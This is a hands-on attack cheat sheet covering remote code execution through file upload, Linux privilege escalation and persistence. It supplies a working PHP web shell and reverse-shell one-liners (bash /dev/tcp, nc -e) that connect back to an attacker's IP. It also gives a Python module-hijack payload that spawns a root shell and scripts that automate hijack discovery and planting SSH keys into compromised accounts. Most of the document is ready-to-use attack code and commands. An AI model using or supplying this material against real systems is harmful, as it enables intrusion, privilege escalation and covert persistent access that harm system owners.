Example RCE via file upload: a minimal PHP web shell. Upload it through the vulnerable upload feature, browse to wherever it was stored, and pass commands in the `command` query parameter. It only runs if the upload lands somewhere the web server executes PHP from, so watch for extension and content-type filters on the upload.

```html
<html>
<body>
<!-- GET form that submits back to this same script as ?command=... -->
<form method="GET" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  <input type="text" name="command" autofocus id="command" size="50">
  <input type="submit" value="Execute">
</form>
<pre>
<?php
// Run the supplied command on the web server and echo its output.
// "2>&1" folds stderr into stdout so error messages are shown as well.
if (isset($_GET['command'])) {
    system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```

# Commands for initiating a reverse shell:

Start a listener on your own machine first (for example `nc -lvnp <port>`), then run one of the following on the target.

Bash: `bash -i >& /dev/tcp/<your-IP>/<port> 0>&1`

Netcat: `nc -e /bin/sh <your-IP> <port>`

Note that `-e` exists in traditional netcat and in ncat, but not in the OpenBSD netcat that many Linux distributions ship; if it is missing, fall back to the bash `/dev/tcp` one-liner above, which needs no netcat on the target at all.

## Enumeration Commands for Privilege Escalation:

Find SUID (set user ID) files. These run with their owner's privileges (often root) regardless of who executes them, so each one is worth checking against known escalation paths:

`find / -perm -4000 -type f 2>/dev/null`

Find files the current user can write to (filtering out the `/proc` pseudo-filesystem noise):

`find / -writable -type f 2>/dev/null | grep -v "/proc/"`

Say you find a Python script that you think you can leverage for priv esc, for example one that runs as root via sudo or cron. You see it imports some modules and would like to know where those modules are being pulled from: if you can make the script pull in your own module instead of the real one, it will run whatever you put in it. Python resolves an import by walking `sys.path` in order and taking the first match, with the script's own directory at `sys.path[0]`, so any writable directory that is searched before the real module's location will do. To list the search path:

`python3 -c 'import sys; print(sys.path)'`

Run this as the same user, and ideally with the same interpreter, that executes the target script, since `sys.path` depends on both.

### Getting a shell with /bin/bash

Once you find a module you can shadow (or a writable directory that is searched before the real module), drop a file named `<module>.py` there containing:

```python
import os
os.system('/bin/bash')
```

Module code runs at import time, so when the script does `import <module>` and finds your copy first, this executes immediately and spawns a shell with the privileges of whoever ran the script.

### Enabling SSH on PWND User Accounts

When you have compromised a user account (a shell as that user) but do not have the user's password, you can generate a new SSH key pair and install the public key so you can log in via SSH without a password. First generate the key pair on your local machine:

`ssh-keygen -t rsa`

Next, copy the generated public key (`~/.ssh/id_rsa.pub`) onto the target machine (via scp, by serving it from a local web server, or simply by pasting it, since it is a single line) and append it to `~/.ssh/authorized_keys` in the compromised user's home directory. If the `.ssh` directory does not exist it must be created; `authorized_keys` is a file inside it, not a directory.
NOTE: with `StrictModes` (the sshd default) SSH rejects key-based logins if the `.ssh` directory, the `authorized_keys` file, or the home directory itself is writable by group or others, or is not owned by the user. The conventional safe settings are `chmod 700 /DIRECTORY/.ssh` and `chmod 600 /DIRECTORY/.ssh/authorized_keys`. Boom! Now you have access to the compromised user via SSH.
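The module-hijack reasoning above (which `sys.path` entries are writable, and which of them are searched before the real module) as an added Python example. This is not code from the original page; the module name `victimdep`, the temp directories and the benign `X = ...` stand-in for the page's `os.system('/bin/bash')` payload are constructed for the demo.

```python
import importlib
import os
import sys


def writable_entries(search_path=None):
    """Return [(index, directory)] for search-path entries the current user can
    write to. A lower index is searched earlier, so it wins at import time."""
    entries = sys.path if search_path is None else search_path
    found = []
    for i, entry in enumerate(entries):
        directory = entry if entry else os.getcwd()  # "" means the cwd
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            found.append((i, directory))
    return found


def real_module_index(module_name, search_path):
    """Index of the first entry that provides module_name as a plain module
    (<name>.py) or a regular package (<name>/__init__.py); None if absent."""
    for i, entry in enumerate(search_path):
        directory = entry if entry else os.getcwd()
        if (os.path.isfile(os.path.join(directory, module_name + ".py"))
                or os.path.isfile(os.path.join(directory, module_name, "__init__.py"))):
            return i
    return None


def hijack_candidates(module_name, search_path):
    """Writable directories searched *before* the one holding the real module.
    Dropping <module_name>.py into any of them shadows the real module. If the
    module is not on the path at all, every writable entry is a candidate."""
    real = real_module_index(module_name, search_path)
    return [d for i, d in writable_entries(search_path) if real is None or i < real]


# Payload from the page: runs at import time with the importing script's privileges.
PAYLOAD = "import os\nos.system('/bin/bash')\n"


def plant_module(directory, module_name, payload=PAYLOAD):
    """Write the shadowing module into directory and return its path."""
    path = os.path.join(directory, module_name + ".py")
    with open(path, "w") as fh:
        fh.write(payload)
    importlib.invalidate_caches()  # make sure the new file is seen by the import system
    return path


def demo():
    """Constructed demonstration: B holds the real 'victimdep' module, A is a
    writable directory listed before it. Shows that A is a candidate only when
    it precedes B, and that a planted file in A is what actually gets imported."""
    import tempfile
    a = tempfile.mkdtemp(prefix="writable_first_")
    b = tempfile.mkdtemp(prefix="real_module_")
    with open(os.path.join(b, "victimdep.py"), "w") as fh:
        fh.write("X = 'real'\n")
    result = {
        "writable_first": a,
        "candidates": hijack_candidates("victimdep", [a, b]),
        "candidates_when_real_first": hijack_candidates("victimdep", [b, a]),
    }
    plant_module(a, "victimdep", "X = 'hijacked'\n")  # benign stand-in for PAYLOAD
    sys.path[:0] = [a, b]
    try:
        result["imported_x"] = importlib.import_module("victimdep").X
    finally:
        del sys.path[:2]
        sys.modules.pop("victimdep", None)
    return result


if __name__ == "__main__":
    # Usage on a target: python3 hijack_check.py <module the target script imports>
    name = sys.argv[1] if len(sys.argv) > 1 else "victimdep"
    for directory in hijack_candidates(name, sys.path):
        print("writable and searched before the real %r: %s" % (name, directory))
```

Run the check under the same user and interpreter as the target script; `sys.path` differs per interpreter, and a directory that is writable for you may not be for the account that actually runs the script.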
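The `authorized_keys` installation and the permission checks from the note above, as an added Python example rather than code from the original page. It installs one public key line with the 700/600 modes the note calls for, refuses to append a duplicate, and then mirrors the checks sshd applies under `StrictModes` (owner must be the user, and home, `.ssh` and `authorized_keys` must not be group- or world-writable). `SAMPLE_PUBKEY` is a constructed placeholder, not a real key.

```python
import os
import stat
import sys
import tempfile

# Constructed placeholder for the demo; replace with the contents of your id_rsa.pub.
SAMPLE_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialNotReal attacker@box"


def install_authorized_key(home_dir, pubkey_line):
    """Append one public-key line to <home_dir>/.ssh/authorized_keys, creating the
    directory if needed, and force the modes sshd expects (700 dir, 600 file).
    Idempotent: an identical key line is not appended twice. Returns the file path."""
    key = pubkey_line.strip()
    if not key or key.startswith("#"):
        raise ValueError("expected a single public key line")
    ssh_dir = os.path.join(home_dir, ".ssh")
    auth_file = os.path.join(ssh_dir, "authorized_keys")

    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)  # makedirs applies the umask; set the mode explicitly

    existing = ""
    if os.path.exists(auth_file):
        with open(auth_file) as fh:
            existing = fh.read()
    if key not in existing.splitlines():
        with open(auth_file, "a") as fh:
            if existing and not existing.endswith("\n"):
                fh.write("\n")  # don't glue our key onto an unterminated last line
            fh.write(key + "\n")
    os.chmod(auth_file, 0o600)
    return auth_file


def strict_modes_problems(home_dir):
    """Report what would make sshd (StrictModes yes) ignore the key: each of the
    home directory, .ssh and authorized_keys must exist, be owned by the current
    user, and not be writable by group or others. Returns [(path, reason)]."""
    problems = []
    ssh_dir = os.path.join(home_dir, ".ssh")
    auth_file = os.path.join(ssh_dir, "authorized_keys")
    for path in (home_dir, ssh_dir, auth_file):
        try:
            st = os.stat(path)
        except FileNotFoundError:
            problems.append((path, "missing"))
            continue
        if st.st_uid != os.geteuid():
            problems.append((path, "not owned by current user"))
        if st.st_mode & 0o022:
            problems.append((path, "group/world writable (%o)" % stat.S_IMODE(st.st_mode)))
    return problems


def demo():
    """Constructed run in a temporary 'home' directory: install the key twice,
    then break the .ssh mode to show the check catching it."""
    home = tempfile.mkdtemp(prefix="pwnd_home_")
    os.chmod(home, 0o755)  # a typical home-directory mode
    path = install_authorized_key(home, SAMPLE_PUBKEY)
    install_authorized_key(home, SAMPLE_PUBKEY)  # second call must not duplicate
    with open(path) as fh:
        lines = fh.read().splitlines()
    ssh_dir = os.path.dirname(path)
    result = {
        "lines": lines,
        "ssh_dir_mode": stat.S_IMODE(os.stat(ssh_dir).st_mode),
        "file_mode": stat.S_IMODE(os.stat(path).st_mode),
        "problems": strict_modes_problems(home),
    }
    os.chmod(ssh_dir, 0o777)  # the mistake the note warns about
    result["problems_after_777"] = strict_modes_problems(home)
    os.chmod(ssh_dir, 0o700)
    return result


if __name__ == "__main__":
    # Usage on the target, as the compromised user:
    #   python3 install_key.py "$HOME" "ssh-rsa AAAA... you@box"
    if len(sys.argv) == 3:
        install_authorized_key(sys.argv[1], sys.argv[2])
        for path, reason in strict_modes_problems(sys.argv[1]):
            print("sshd will reject the key: %s: %s" % (path, reason))
    else:
        print(demo())
```

After installing the key, connect from your machine with `ssh -i <private-key> <user>@<target>`. If it still prompts for a password, run `strict_modes_problems` on the home directory; a group-writable home directory is a common reason the key is silently ignored.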